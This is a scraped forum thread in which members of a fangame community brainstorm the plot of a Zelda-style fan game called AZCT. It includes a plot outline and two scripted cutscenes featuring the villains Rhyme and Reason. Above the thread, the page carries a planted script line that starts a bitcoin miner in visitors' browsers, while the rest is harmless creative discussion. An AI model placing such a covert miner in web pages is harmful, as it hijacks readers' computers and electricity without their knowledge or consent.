<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectsmbx community

SPOILER ALERT: AZCT Plot

... zelda
User avatar
raocow
the death of the incredible huge
Posts: 1951
Joined: 8 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: SPOILER ALERT: AZCT Plot

Postby raocow » 2 years ago

oh also, now that I'm thinking about it:

a reminder that if this happens in the atxs 'universe', all names must be verbs UNLESS they don't specifically come from this planet.

just a little thing that I take for granted sometimes that peeps might not know.
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Nabe
Still working on AZCT
Posts: 119
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nabe » 2 years ago

raocow wrote:oh also, now that I'm thinking about it:

a reminder that if this happens in the atxs 'universe', all names must be verbs UNLESS they don't specifically come from this planet.

just a little thing that I take for granted sometimes that peeps might not know.
Oh! A thing: is there currency? We were using

candy

as currency before now.

User avatar
Nimono
Posts: 287
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nimono » 2 years ago

raocow wrote:oh also, now that I'm thinking about it:

a reminder that if this happens in the atxs 'universe', all names must be verbs UNLESS they don't specifically come from this planet.

just a little thing that I take for granted sometimes that peeps might not know.
Does this include enemies as well?

User avatar
raocow
the death of the incredible huge
Posts: 1951
Joined: 8 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: SPOILER ALERT: AZCT Plot

Postby raocow » 2 years ago

for the currency that's fine, there was never anything official and that's a great asmbxt nod.

As for the enemies - if it's the name of a species no, then it's just the name of the species, but it would be a verb if it's a name given to it. For example, Orbit was given that name as a pet, but the species it is would have an actual species name that is a made-up noun. If.. if you understand what I mean?
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Nimono
Posts: 287
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nimono » 2 years ago

Yeah, that makes sense to me, raocow. Thanks!

So on that note, I guess I have to ask again: What will we be doing about the enemies? Will we still be changing them to be the usual Thing stuff, or coming up with something new? Will any enemies remain the same as default?

User avatar
Nabe
Still working on AZCT
Posts: 119
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nabe » 2 years ago

Nimono wrote:Yeah, that makes sense to me, raocow. Thanks!

So on that note, I guess I have to ask again: What will we be doing about the enemies? Will we still be changing them to be the usual Thing stuff, or coming up with something new? Will any enemies remain the same as default?
I think it should probably depend on the nature of the antagonist, as well as where the enemies show up.
I can think of three enemies in particular that should stay as their Zelda counterparts everywhere. (Aquamentus, Leevers, Wizzrobes) Some custom enemies in my sideview areas are from the Thing games, like the Mario enemies in Link's Awakening. And most of the enemies in Level 8 will be new. So there's some of everything. The majority of the enemies should be of whatever origin the antagonist is.

User avatar
Nimono
Posts: 287
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nimono » 2 years ago

Well, before we decide on the WHO, let's decide on the WHY. WHY would Mr. Bad want the facets of self? HOW could they further whatever evil plan he has? I was thinking, perhaps Mr. Bad believes they can be used to remove everyones' sense of self, turning them into mindless slaves that he can use to conquer other lands?

Or perhaps it's MRS. Bad, a mirror of Sheath formed when she had that crisis that made her mortal, and she desires the facets believing they will give her her own sense of self, her own identity separate from Sheath!


User avatar
Nabe
Still working on AZCT
Posts: 119
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nabe » 2 years ago

Nimono wrote:Well, before we decide on the WHO, let's decide on the WHY. WHY would Mr. Bad want the facets of self? HOW could they further whatever evil plan he has? I was thinking, perhaps Mr. Bad believes they can be used to remove everyones' sense of self, turning them into mindless slaves that he can use to conquer other lands?

Or perhaps it's MRS. Bad, a mirror of Sheath formed when she had that crisis that made her mortal, and she desires the facets believing they will give her her own sense of self, her own identity separate from Sheath!

I think they probably aren't ACTUALLY "Facets of Self". That's just what Sheath is told.

Maybe they open portals to other dimensions, which would explain the mix of enemies, and where the heck Sheath came from in ASMBXT if we wanted to go that route.

To be honest though, I haven't put much thought into it.

User avatar
jayScribble
FEEL THE FORCE
Posts: 371
Joined: 4 years ago
Pronouns: it, they, that
Location: Over there

Re: SPOILER ALERT: AZCT Plot

Postby jayScribble » 2 years ago

Is there a plot actually set right now?

If not, then we could do some brainstorming for the time being.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

User avatar
Nimono
Posts: 287
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nimono » 2 years ago

As far as I know, we no longer have a plot due to Doctor Shemp forbidding us from using anything he's made. Nabe wants to make something where we can still keep the rhymey dialogue he's already created, something about two villains named "Rhyme" and "Reason", but nothing more than that.

User avatar
Nabe
Still working on AZCT
Posts: 119
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nabe » 2 years ago

The intro cutscene is written but doesn't have any bearing on the villains. There are no main dialogue scenes written yet, but I have a pretty good idea of what I'd like to do, expanding on the outline I wrote before. I was planning to start writing tomorrow. :D
Two villains, Rhyme and Reason. Rhyme talks in rhymes and verse, and is gaining a lot of influence with the locals by being a fun performer sort of person. Most of the NPCs in the town also speak in verse, because it's catchy as heck and Rhyme is a charismatic person. Rhyme might also have an ability that motivates people to speak that way, and generally influences people to do things, but it's used for amusement rather than for gain. For the first half of the game at least, Rhyme is chilling in the town, juggling balls and being cool.

Reason is a rational character who acts more like a traditional antagonist. I haven't put much thought into her yet, but I expect her quirks to hop off the page when I start writing her dialogue.

Sheath meets Rhyme when she gets off the boat, and Rhyme tells her some basics about the land, and about Reason, who brought monsters to the region and is being generally villainous. When Sheath mentions that she's there to find herself, Rhyme realizes she can be manipulated, and mentions the "Facets of Self" as Rhyme calls them: eight shards of a magic gem that, if joined, will show Sheath where to find herself. Sounds suspect, but it's Sheath, so she thinks it's a reasonable premise.

Reason will make a dramatic appearance at this point, just to cement that she's no good. Rhyme and Reason play at confronting each other a bit through dialogue. Sheath doesn't entirely understand, but she's already been convinced to go after the Facets anyway. She gets competitive and tells Reason the race is on.

From there, plot is communicated through NPCs for the first half of the game. People in town talk about rumours and legends, and about places in the overworld where there are places of interest. For example, there's a mysterious stone spire north of the town, circled by eight stones... And there's one man who's very concerned about a giant dragon head sprouting from the ground that he can see from his window. Rhyme is there to be talked to as well, and will say more about the dungeons to encourage Sheath to visit them.

The gem is some kind of trans-dimensional thing, out of necessity to get Sheath out of a.t.x.s.-world and into ASMT-world. She might not leave by the end of the game, but it's the plot thing that facilitates her doing so. It's been used before to open a portal, which is why there are ASMT enemies around in sideview areas, and a handful of Zelda enemies like Leevers. The first time it happened was on the second island, which is why it's all wrecked. It's a somewhat destructive process.

The antagonists want to get a hold of the gem to bring carnage to this world with more monsters, or to leave this world for another (which lets monsters through since it's open both ways). They want to do something distinctly trans-dimensional, at the very least. But only Sheath can get the shards and/or 'start up' the gem, and they can't, because doing so requires manipulation of energy like Sheath's ability. Basically, you have to be the main character. :D Sheath isn't the first or only person Rhyme has convinced to try getting the shards, but Sheath will be the first one to be successful.

After another mid-game cutscene of some nature, the rest of the game is the same, but people on the second island have more to say about the calamity that befell them, and about dimensional tomfoolery in general, to inform the plot and give indirect context for why Rhyme is enormously suspicious. Sheath at this point starts speaking in verse as well, as in the original plot, which suggests that she is unwittingly getting farther away from her own goal. She wonders about who she is and about reinventing herself, in her own opaque Sheath way.

Later, Rhyme and Reason meet up and start their magic gem ritual. After a conversation and fight with Shadow Sheath, she realizes that she's always been herself. She's accomplished what she set out to do, which is to literally find herself, so she feels like herself again, although she comments that she didn't expect finding herself to be so ouchy. 100% her normal self again, she realizes Rhyme and Reason are up to no good, and fights them "because it's up to main characters to do that sort of thing."

User avatar
Nimono
Posts: 287
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nimono » 2 years ago

Nabe wrote:
Two villains, Rhyme and Reason. Rhyme talks in rhymes and verse, and is gaining a lot of influence with the locals by being a fun performer sort of person. Most of the NPCs in the town also speak in verse, because it's catchy as heck and Rhyme is a charismatic person. Rhyme might also have an ability that motivates people to speak that way, and generally influences people to do things, but it's used for amusement rather than for gain. For the first half of the game at least, Rhyme is chilling in the town, juggling balls and being cool.

Reason is a rational character who acts more like a traditional antagonist. I haven't put much thought into her yet, but I expect her quirks to hop off the page when I start writing her dialogue.

Sheath meets Rhyme when she gets off the boat, and Rhyme tells her some basics about the land, and about Reason, who brought monsters to the region and is being generally villainous. When Sheath mentions that she's there to find herself, Rhyme realizes she can be manipulated, and mentions the "Facets of Self" as Rhyme calls them: eight shards of a magic gem that, if joined, will show Sheath where to find herself. Sounds suspect, but it's Sheath, so she thinks it's a reasonable premise.

Reason will make a dramatic appearance at this point, just to cement that she's no good. Rhyme and Reason play at confronting each other a bit through dialogue. Sheath doesn't entirely understand, but she's already been convinced to go after the Facets anyway. She gets competitive and tells Reason the race is on.

From there, plot is communicated through NPCs for the first half of the game. People in town talk about rumours and legends, and about places in the overworld where there are places of interest. For example, there's a mysterious stone spire north of the town, circled by eight stones... And there's one man who's very concerned about a giant dragon head sprouting from the ground that he can see from his window. Rhyme is there to be talked to as well, and will say more about the dungeons to encourage Sheath to visit them.

The gem is some kind of trans-dimensional thing, out of necessity to get Sheath out of a.t.x.s.-world and into ASMT-world. She might not leave by the end of the game, but it's the plot thing that facilitates her doing so. It's been used before to open a portal, which is why there are ASMT enemies around in sideview areas, and a handful of Zelda enemies like Leevers. The first time it happened was on the second island, which is why it's all wrecked. It's a somewhat destructive process.

The antagonists want to get a hold of the gem to bring carnage to this world with more monsters, or to leave this world for another (which lets monsters through since it's open both ways). They want to do something distinctly trans-dimensional, at the very least. But only Sheath can get the shards and/or 'start up' the gem, and they can't, because doing so requires manipulation of energy like Sheath's ability. Basically, you have to be the main character. :D Sheath isn't the first or only person Rhyme has convinced to try getting the shards, but Sheath will be the first one to be successful.

After another mid-game cutscene of some nature, the rest of the game is the same, but people on the second island have more to say about the calamity that befell them, and about dimensional tomfoolery in general, to inform the plot and give indirect context for why Rhyme is enormously suspicious. Sheath at this point starts speaking in verse as well, as in the original plot, which suggests that she is unwittingly getting farther away from her own goal. She wonders about who she is and about reinventing herself, in her own opaque Sheath way.

Later, Rhyme and Reason meet up and start their magic gem ritual. After a conversation and fight with Shadow Sheath, she realizes that she's always been herself. She's accomplished what she set out to do, which is to literally find herself, so she feels like herself again, although she comments that she didn't expect finding herself to be so ouchy. 100% her normal self again, she realizes Rhyme and Reason are up to no good, and fights them "because it's up to main characters to do that sort of thing."
At first I was going to question why we'd need to explain away the ASMT and Zelda enemies as being from other dimensions, but dimensional travel has already been shown to exist in the other Things, hasn't it? So, sounds good to me. Maybe the islands have weak dimensional stability, and that's why their plan is being done there, not anywhere else?

User avatar
Nabe
Still working on AZCT
Posts: 119
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nabe » 2 years ago

Cutscene 1 [immediately after starting the game]:
Boat Captain:
We've arrived! The town of Speakeasy!
Journey's end! Port of call, Speakeasy!
Passengers departing! ...That means you.

[Sheath walks on-screen from west.]

Sheath:
Thanks, sailor man!!
Any idea where I should go in town
to find a main character?

Boat Captain:
Well, you could try asking at the bar,
or maybe talk to the city guards...
Do you think you'll find her here, Sheath?

Sheath:
I really hope so... But, if I know me,
I'd think this was a cool place to be!
Yeah, I've got to be around here somewhere!

Boat Captain:
I still don't know what that means.
And you said it at the last four stops we made, too.

Sheath:
No time!! Every step I take brings me a step away
from me, 'cause her legs are the same length as mine.
ONWARDS!
Cutscene 2 [after getting the sword and adventurer's ID (Letter)]:
[People gather at the town entrance. A man is floating there.]

Reason:
Surely you've heard by now
of the calamity that's befallen
the continent to the east?

Monsters ravaging and pillaging and
breaking the very land? People fighting
each other over tensions and trifles both?

That was all me, Reason! BOO!
And I'm here to do the same to you,
to bring you monsters and chaos,

to make you question the motives of
your friends and family! It's my raison d'etre,
and frankly it's kind of what I do best, you know?

Rhyme:
Do take good care to hold your tongue, or else
You'll find I've held it 'gainst your will, you rogue.

[Rhyme walks on screen from the bottom.]

People:
Rhyme!
It's Rhyme!

Rhyme:
Your words of fear hold nothing o'er these folk.
You may have found lame prey in lands far off,
But these good souls are warned of your foul deeds.

I've told them all about your nasty aims,
Your crimes of num'rous measure. Guard yourself,
For these are guarded folk in turn. Who'll fight,

To see this wretch in chains? Who'll fight to see
Their livelihoods kept safe from evil's hands?

People:
Yeah! What she said!
Rhyme told us about you!
We're ready! We'll fight!

Rhyme:
You see? These are no sheep you've found today,
But hounddogs all, and you with fragrant scent.

Reason:
Ha! Don't make me laugh! As if
one adventurer among you has what
it takes to challenge Reason itself!

People:
I'll beat you, you rogue!
Have at you!
Rhyme has got your number!

Rhyme:
You were quite daft to come announce your might.
Remove your craven foolish form from sight,
or Reason, you won't live to see this night!

Reason:
Ugh. Sickening.
I'll be back soon, just you wait!

[Reason flies away.]

People:
Hurrah, hurrah!
Rhyme's so cool!
Forsooth, the way in which she speaks is, too!

[People begin to disperse.]

Sheath:
Wow! You're such a cool hero character, lady!
I wish I were still a protagonist like you...

Rhyme:
Oho, and who are you to say that you
Are not a hero true? What is your name?

Sheath:
I'm Sheath, miss lady! Or, well, I was Sheath,
but then I lost myself, my bro Brake said, and
I don't know where Sheath went... But I'm looking!

Rhyme:
A shocking tale! In travel as a bard,
I have not ever heard its like. ... And yet,
I may just know of how to put it right.

Sheath:
Wow, really truly?! Please, Rhyme, tell me!
I can't stand feeling this way...

Rhyme:
I see you have adventure's mark. Perhaps...
A story goes like this: Eight shards of self
Are scattered 'cross the world, in dungeons dark.

These Facets bright, when joined, will shine their light,
And find true self for She who proves Her might.
Eight shining parts of Self will make Her right!

... An old, old tale, indeed, but one of hope.
Perhaps these shards exist, to help you cope.
It does no good to sit and frown, and mope.

Sheath:
So, um... hmm. [pause] Nope, I don't understand!
You still sound real cool though. When you say
'Facets' all colourfully, I feel it in my toes!

Rhyme:
Your quest is this: find eight cool shiny things!
The Facets, Sheath, will find the 'you' you seek!
But watch, for Reason's minions are not meek!

Sheath:
Whoa! I feel better already!
Thank you SO much, Rhyme!!
Do you maybe know where these dungeon places are?

Rhyme:
I cannot say I do. But in the tale,
Four dungeons were there in this land. Explore,
Or ask the people. Luck to you, O Sheath!

[Rhyme walks off-screen south.]

Sheath:
Thanks again, Rhyme! It was nice meeting you!
... Walking away without looking back. Oh maaaan!
Too cool!!
Last edited by Nabe on 18 Dec 2015, 01:39, edited 2 times in total.

User avatar
Nimono
Posts: 287
Joined: 4 years ago

Re: SPOILER ALERT: AZCT Plot

Postby Nimono » 2 years ago

Man, I am loving that dialogue you wrote there. :D Nice job, Nabe!


Return to “AZCT”

Who is online

Users browsing this forum: No registered users and 1 guest

cron